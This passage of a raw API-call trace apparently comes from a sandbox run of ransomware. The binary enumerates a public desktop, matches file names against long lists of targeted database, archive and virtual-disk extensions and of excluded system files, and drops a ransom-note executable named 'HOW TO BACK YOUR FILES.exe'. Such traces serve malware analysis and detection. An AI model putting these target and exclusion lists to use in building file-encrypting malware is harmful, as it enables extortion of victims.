lstrlenW (lpString="accdw") returned 5 [0040.293] lstrcmpiW (lpString1="a.mp3", lpString2="accdw") returned -1 [0040.293] lstrlenW (lpString="accft") returned 5 [0040.293] lstrcmpiW (lpString1="a.mp3", lpString2="accft") returned -1 [0040.293] lstrlenW (lpString="adb") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0040.293] lstrlenW (lpString="adb") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0040.293] lstrlenW (lpString="ade") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="ade") returned 1 [0040.293] lstrlenW (lpString="adf") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="adf") returned 1 [0040.293] lstrlenW (lpString="adn") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="adn") returned 1 [0040.293] lstrlenW (lpString="adp") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="adp") returned 1 [0040.293] lstrlenW (lpString="alf") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="alf") returned 1 [0040.293] lstrlenW (lpString="ask") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="ask") returned 1 [0040.293] lstrlenW (lpString="btr") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="btr") returned 1 [0040.293] lstrlenW (lpString="cat") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="cat") returned 1 [0040.293] lstrlenW (lpString="cdb") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="cdb") returned 1 [0040.293] lstrlenW (lpString="ckp") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="ckp") returned 1 [0040.293] lstrlenW (lpString="cma") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="cma") returned 1 [0040.293] lstrlenW (lpString="cpd") returned 3 [0040.293] lstrcmpiW (lpString1="mp3", lpString2="cpd") returned 1 [0040.294] lstrlenW (lpString="dacpac") returned 6 [0040.294] lstrcmpiW (lpString1="ba.mp3", lpString2="dacpac") returned -1 [0040.294] lstrlenW (lpString="dad") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dad") returned 1 [0040.294] lstrlenW (lpString="dadiagrams") returned 10 [0040.294] lstrcmpiW (lpString1="alimba.mp3", lpString2="dadiagrams") returned -1 [0040.294] lstrlenW (lpString="daschema") returned 8 [0040.294] lstrcmpiW (lpString1="imba.mp3", lpString2="daschema") returned 1 [0040.294] lstrlenW (lpString="db-journal") returned 10 [0040.294] lstrcmpiW (lpString1="alimba.mp3", lpString2="db-journal") returned -1 [0040.294] lstrlenW (lpString="db-shm") returned 6 [0040.294] lstrcmpiW (lpString1="ba.mp3", lpString2="db-shm") returned -1 [0040.294] lstrlenW (lpString="db-wal") returned 6 [0040.294] lstrcmpiW (lpString1="ba.mp3", lpString2="db-wal") returned -1 [0040.294] lstrlenW (lpString="dbc") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dbc") returned 1 [0040.294] lstrlenW (lpString="dbs") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dbs") returned 1 [0040.294] lstrlenW (lpString="dbt") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dbt") returned 1 [0040.294] lstrlenW (lpString="dbv") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dbv") returned 1 [0040.294] lstrlenW (lpString="dbx") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dbx") returned 1 [0040.294] lstrlenW (lpString="dcb") returned 3 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dcb") returned 1 [0040.294] lstrcmpiW (lpString1="mp3", lpString2="dct") returned 1 [0040.294] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0040.294] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0040.294] lstrlenW (lpString="Ares865") returned 7 [0040.295] lstrcmpiW (lpString1="air.mp3", lpString2="Ares865") returned -1 [0040.295] lstrlenW (lpString=".dll") returned 4 [0040.295] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".dll") returned 1 [0040.295] lstrlenW (lpString=".lnk") returned 4 [0040.295] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".lnk") returned 1 [0040.295] lstrlenW (lpString=".ini") returned 4 [0040.295] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".ini") returned 1 [0040.295] lstrlenW (lpString=".sys") returned 4 [0040.295] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".sys") returned 1 [0040.295] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0040.295] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0040.295] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0040.295] lstrlenW (lpString="Ares865") returned 7 [0040.295] lstrcmpiW (lpString1="way.mp3", lpString2="Ares865") returned 1 [0040.295] lstrlenW (lpString=".dll") returned 4 [0040.295] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".dll") returned 1 [0040.295] lstrlenW (lpString=".lnk") returned 4 [0040.295] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".lnk") returned 1 [0040.295] lstrlenW (lpString=".ini") returned 4 [0040.295] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".ini") returned 1 [0040.295] lstrlenW (lpString=".sys") returned 4 [0040.295] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".sys") returned 1 [0040.295] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0040.295] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0040.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed0c8 | out: hHeap=0x2b0000) returned 1 [0040.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0040.295] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0040.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0040.295] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.295] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.300] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ac48e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ac48e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.300] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.300] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.300] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.300] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ac48e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ac48e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.300] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.300] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.300] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.300] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.300] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0040.300] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.300] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="aoldtz.exe") returned -1 [0040.300] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".") returned 1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="..") returned 1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="windows") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="bootmgr") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="temp") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="pagefile.sys") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="boot") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ids.txt") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ntuser.dat") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="perflogs") returned -1 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="MSBuild") returned -1 [0040.301] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0040.301] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\*") returned 25 [0040.301] lstrcpyW (in: lpString1=0x2e2e890, lpString2="Adobe Reader X.lnk" | out: lpString1="Adobe Reader X.lnk") returned="Adobe Reader X.lnk" [0040.301] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0040.301] lstrlenW (lpString="Ares865") returned 7 [0040.301] lstrcmpiW (lpString1="r X.lnk", lpString2="Ares865") returned 1 [0040.301] lstrlenW (lpString=".dll") returned 4 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".dll") returned 1 [0040.301] lstrlenW (lpString=".lnk") returned 4 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".lnk") returned 1 [0040.301] lstrlenW (lpString=".ini") returned 4 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".ini") returned 1 [0040.301] lstrlenW (lpString=".sys") returned 4 [0040.301] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".sys") returned 1 [0040.301] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0040.301] lstrlenW (lpString="bak") returned 3 [0040.301] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0040.301] lstrlenW (lpString="ba_") returned 3 [0040.301] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0040.301] lstrlenW (lpString="dbb") returned 3 [0040.301] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0040.301] lstrlenW (lpString="vmdk") returned 4 [0040.301] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0040.301] lstrlenW (lpString="rar") returned 3 [0040.301] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0040.301] lstrlenW (lpString="zip") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0040.302] lstrlenW (lpString="tgz") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0040.302] lstrlenW (lpString="vbox") returned 4 [0040.302] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0040.302] lstrlenW (lpString="vdi") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0040.302] lstrlenW (lpString="vhd") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0040.302] lstrlenW (lpString="vhdx") returned 4 [0040.302] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0040.302] lstrlenW (lpString="avhd") returned 4 [0040.302] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0040.302] lstrlenW (lpString="db") returned 2 [0040.302] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0040.302] lstrlenW (lpString="db2") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0040.302] lstrlenW (lpString="db3") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0040.302] lstrlenW (lpString="dbf") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0040.302] lstrlenW (lpString="mdf") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0040.302] lstrlenW (lpString="mdb") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0040.302] lstrlenW (lpString="sql") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0040.302] lstrlenW (lpString="sqlite") returned 6 [0040.302] lstrcmpiW (lpString1=" X.lnk", lpString2="sqlite") returned -1 [0040.302] lstrlenW (lpString="sqlite3") returned 7 [0040.302] lstrcmpiW (lpString1="r X.lnk", lpString2="sqlite3") returned -1 [0040.302] lstrlenW (lpString="sqlitedb") returned 8 [0040.302] lstrcmpiW (lpString1="er X.lnk", lpString2="sqlitedb") returned -1 [0040.302] lstrlenW (lpString="xml") returned 3 [0040.302] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0040.303] lstrlenW (lpString="$er") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0040.303] lstrlenW (lpString="4dd") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0040.303] lstrlenW (lpString="4dl") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0040.303] lstrlenW (lpString="^^^") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0040.303] lstrlenW (lpString="abs") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0040.303] lstrlenW (lpString="abx") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0040.303] lstrlenW (lpString="accdb") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accdb") returned 1 [0040.303] lstrlenW (lpString="accdc") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accdc") returned 1 [0040.303] lstrlenW (lpString="accde") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accde") returned 1 [0040.303] lstrlenW (lpString="accdr") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accdr") returned 1 [0040.303] lstrlenW (lpString="accdt") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accdt") returned 1 [0040.303] lstrlenW (lpString="accdw") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accdw") returned 1 [0040.303] lstrlenW (lpString="accft") returned 5 [0040.303] lstrcmpiW (lpString1="X.lnk", lpString2="accft") returned 1 [0040.303] lstrlenW (lpString="adb") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0040.303] lstrlenW (lpString="adb") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0040.303] lstrlenW (lpString="ade") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0040.303] lstrlenW (lpString="adf") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0040.303] lstrlenW (lpString="adn") returned 3 [0040.303] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0040.304] lstrlenW (lpString="adp") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0040.304] lstrlenW (lpString="alf") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0040.304] lstrlenW (lpString="ask") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0040.304] lstrlenW (lpString="btr") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0040.304] lstrlenW (lpString="cat") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0040.304] lstrlenW (lpString="cdb") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0040.304] lstrlenW (lpString="ckp") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0040.304] lstrlenW (lpString="cma") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0040.304] lstrlenW (lpString="cpd") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0040.304] lstrlenW (lpString="dacpac") returned 6 [0040.304] lstrcmpiW (lpString1=" X.lnk", lpString2="dacpac") returned -1 [0040.304] lstrlenW (lpString="dad") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0040.304] lstrlenW (lpString="dadiagrams") returned 10 [0040.304] lstrcmpiW (lpString1="ader X.lnk", lpString2="dadiagrams") returned -1 [0040.304] lstrlenW (lpString="daschema") returned 8 [0040.304] lstrcmpiW (lpString1="er X.lnk", lpString2="daschema") returned 1 [0040.304] lstrlenW (lpString="db-journal") returned 10 [0040.304] lstrcmpiW (lpString1="ader X.lnk", lpString2="db-journal") returned -1 [0040.304] lstrlenW (lpString="db-shm") returned 6 [0040.304] lstrcmpiW (lpString1=" X.lnk", lpString2="db-shm") returned -1 [0040.304] lstrlenW (lpString="db-wal") returned 6 [0040.304] lstrcmpiW (lpString1=" X.lnk", lpString2="db-wal") returned -1 [0040.304] lstrlenW (lpString="dbc") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0040.304] lstrlenW (lpString="dbs") returned 3 [0040.304] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0040.305] lstrlenW (lpString="dbt") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0040.305] lstrlenW (lpString="dbv") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0040.305] lstrlenW (lpString="dbx") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0040.305] lstrlenW (lpString="dcb") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0040.305] lstrlenW (lpString="dct") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0040.305] lstrlenW (lpString="dcx") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0040.305] lstrlenW (lpString="ddl") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0040.305] lstrlenW (lpString="dlis") returned 4 [0040.305] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0040.305] lstrlenW (lpString="dp1") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0040.305] lstrlenW (lpString="dqy") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0040.305] lstrlenW (lpString="dsk") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0040.305] lstrlenW (lpString="dsn") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0040.305] lstrlenW (lpString="dtsx") returned 4 [0040.305] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0040.305] lstrlenW (lpString="dxl") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0040.305] lstrlenW (lpString="eco") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0040.305] lstrlenW (lpString="ecx") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0040.305] lstrlenW (lpString="edb") returned 3 [0040.305] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0040.305] lstrlenW (lpString="epim") returned 4 [0040.305] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0040.305] lstrlenW (lpString="fcd") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0040.306] lstrlenW (lpString="fdb") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0040.306] lstrlenW (lpString="fic") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0040.306] lstrlenW (lpString="flexolibrary") returned 12 [0040.306] lstrcmpiW (lpString1="Reader X.lnk", lpString2="flexolibrary") returned 1 [0040.306] lstrlenW (lpString="fm5") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0040.306] lstrlenW (lpString="fmp") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0040.306] lstrlenW (lpString="fmp12") returned 5 [0040.306] lstrcmpiW (lpString1="X.lnk", lpString2="fmp12") returned 1 [0040.306] lstrlenW (lpString="fmpsl") returned 5 [0040.306] lstrcmpiW (lpString1="X.lnk", lpString2="fmpsl") returned 1 [0040.306] lstrlenW (lpString="fol") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0040.306] lstrlenW (lpString="fp3") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0040.306] lstrlenW (lpString="fp4") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0040.306] lstrlenW (lpString="fp5") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0040.306] lstrlenW (lpString="fp7") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0040.306] lstrlenW (lpString="fpt") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0040.306] lstrlenW (lpString="frm") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0040.306] lstrlenW (lpString="gdb") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0040.306] lstrlenW (lpString="gdb") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0040.306] lstrlenW (lpString="grdb") returned 4 [0040.306] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0040.306] lstrlenW (lpString="gwi") returned 3 [0040.306] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0040.307] lstrlenW (lpString="hdb") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0040.307] lstrlenW (lpString="his") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0040.307] lstrlenW (lpString="ib") returned 2 [0040.307] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0040.307] lstrlenW (lpString="idb") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0040.307] lstrlenW (lpString="ihx") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0040.307] lstrlenW (lpString="itdb") returned 4 [0040.307] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0040.307] lstrlenW (lpString="itw") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0040.307] lstrlenW (lpString="jet") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0040.307] lstrlenW (lpString="jtx") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0040.307] lstrlenW (lpString="kdb") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0040.307] lstrlenW (lpString="kexi") returned 4 [0040.307] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0040.307] lstrlenW (lpString="kexic") returned 5 [0040.307] lstrcmpiW (lpString1="X.lnk", lpString2="kexic") returned 1 [0040.307] lstrlenW (lpString="kexis") returned 5 [0040.307] lstrcmpiW (lpString1="X.lnk", lpString2="kexis") returned 1 [0040.307] lstrlenW (lpString="lgc") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0040.307] lstrlenW (lpString="lwx") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0040.307] lstrlenW (lpString="maf") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0040.307] lstrlenW (lpString="maq") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0040.307] lstrlenW (lpString="mar") returned 3 [0040.307] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0040.308] lstrlenW (lpString="marshal") returned 7 [0040.308] lstrcmpiW (lpString1="r X.lnk", lpString2="marshal") returned 1 [0040.308] lstrlenW (lpString="mas") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0040.308] lstrlenW (lpString="mav") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0040.308] lstrlenW (lpString="maw") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0040.308] lstrlenW (lpString="mdbhtml") returned 7 [0040.308] lstrcmpiW (lpString1="r X.lnk", lpString2="mdbhtml") returned 1 [0040.308] lstrlenW (lpString="mdn") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0040.308] lstrlenW (lpString="mdt") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0040.308] lstrlenW (lpString="mfd") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0040.308] lstrlenW (lpString="mpd") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0040.308] lstrlenW (lpString="mrg") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0040.308] lstrlenW (lpString="mud") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0040.308] lstrlenW (lpString="mwb") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0040.308] lstrlenW (lpString="myd") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0040.308] lstrlenW (lpString="ndf") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0040.308] lstrlenW (lpString="nnt") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0040.308] lstrlenW (lpString="nrmlib") returned 6 [0040.308] lstrcmpiW (lpString1=" X.lnk", lpString2="nrmlib") returned -1 [0040.308] lstrlenW (lpString="ns2") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0040.308] lstrlenW (lpString="ns3") returned 3 [0040.308] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0040.308] lstrlenW (lpString="ns4") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0040.309] lstrlenW (lpString="nsf") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0040.309] lstrlenW (lpString="nv") returned 2 [0040.309] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0040.309] lstrlenW (lpString="nv2") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0040.309] lstrlenW (lpString="nwdb") returned 4 [0040.309] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0040.309] lstrlenW (lpString="nyf") returned 3 [0040.309] lstrcmpiW 